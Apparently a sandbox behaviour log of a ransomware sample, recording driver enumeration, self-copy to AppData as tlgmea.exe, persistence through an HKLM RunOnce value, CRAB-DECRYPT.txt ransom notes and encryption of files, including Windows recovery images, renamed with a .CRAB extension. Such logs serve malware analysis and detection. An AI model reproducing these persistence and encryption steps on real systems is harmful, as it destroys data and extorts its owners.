Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Driver Enumerate load_addresses = 1703576 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 3735552 True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, type = size True 1
Fn
Driver Enumerate load_addresses = 1703528 True 1
Fn
Driver Enumerate load_addresses = 3801088 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Get Name load_address = 301989888 True 1
Fn
Driver Get Name load_address = 305725440 True 1
Fn
Driver Get Name load_address = 3888709632 True 1
Fn
Driver Get Name load_address = 3888775168 True 1
Fn
Driver Get Name load_address = 307167232 True 1
Fn
Driver Get Name load_address = 307232768 True 1
Fn
Driver Get Name load_address = 3889299456 True 1
Fn
Driver Get Name load_address = 3889496064 True 1
Fn
Driver Get Name load_address = 3889627136 True 1
Fn
Driver Get Name load_address = 3889758208 True 1
Fn
Driver Get Name load_address = 3889889280 True 1
Fn
Driver Get Name load_address = 3874816000 True 1
Fn
Driver Get Name load_address = 3882090496 True 1
Fn
Driver Get Name load_address = 3885170688 True 1
Fn
Driver Get Name load_address = 3870949376 True 1
Fn
Driver Get Name load_address = 3885367296 True 1
Fn
Driver Get Name load_address = 3894280192 True 1
Fn
Driver Get Name load_address = 3871408128 True 1
Fn
Driver Get Name load_address = 3871735808 True 1
Fn
Driver Get Name load_address = 3872456704 True 1
Fn
Driver Get Name load_address = 3906994176 True 1
Fn
Driver Get Name load_address = 3907321856 True 1
Fn
Driver Get Name load_address = 3907518464 True 1
Fn
Driver Get Name load_address = 3908304896 True 1
Fn
Driver Get Name load_address = 3908894720 True 1
Fn
Driver Get Name load_address = 3896508416 True 1
Fn
Driver Get Name load_address = 3896901632 True 1
Fn
Driver Get Name load_address = 3897032704 True 1
Fn
Driver Get Name load_address = 3897753600 True 1
Fn
Driver Enumerate load_addresses = 1703540 True 1
Fn
Driver Enumerate load_addresses = 3801088 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Enumerate load_addresses = 1703528 True 1
Fn
Driver Enumerate load_addresses = 3801088 True 1
Fn
Driver Enumerate load_addresses = 1703540 True 1
Fn
Driver Enumerate load_addresses = 3801088 True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, filename = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, desired_access = FILE_MAP_COPY True 1
Fn
Driver Enumerate load_addresses = 1703528 True 1
Fn
Driver Enumerate load_addresses = 4128768 True 1
Fn
Driver Enumerate load_addresses = 1703540 True 1
Fn
Driver Enumerate load_addresses = 4128768 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 326665 True 1
Fn
Data
Module Unmap process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x779af8d0 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = eqrpmoefolj, data = "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe", size = 120, type = REG_SZ True 1
Fn
Thread 0xce0
7000 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\WindowsRE\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\WindowsRE\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\boot.sdi, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\WindowsRE\boot.sdi, destination_filename = C:\Recovery\WindowsRE\boot.sdi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\ReAgent.xml, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\WindowsRE\ReAgent.xml, destination_filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 1048576, size_out = 1041 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 1056 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\Winre.wim, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\WindowsRE\Winre.wim, destination_filename = C:\Recovery\WindowsRE\Winre.wim.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
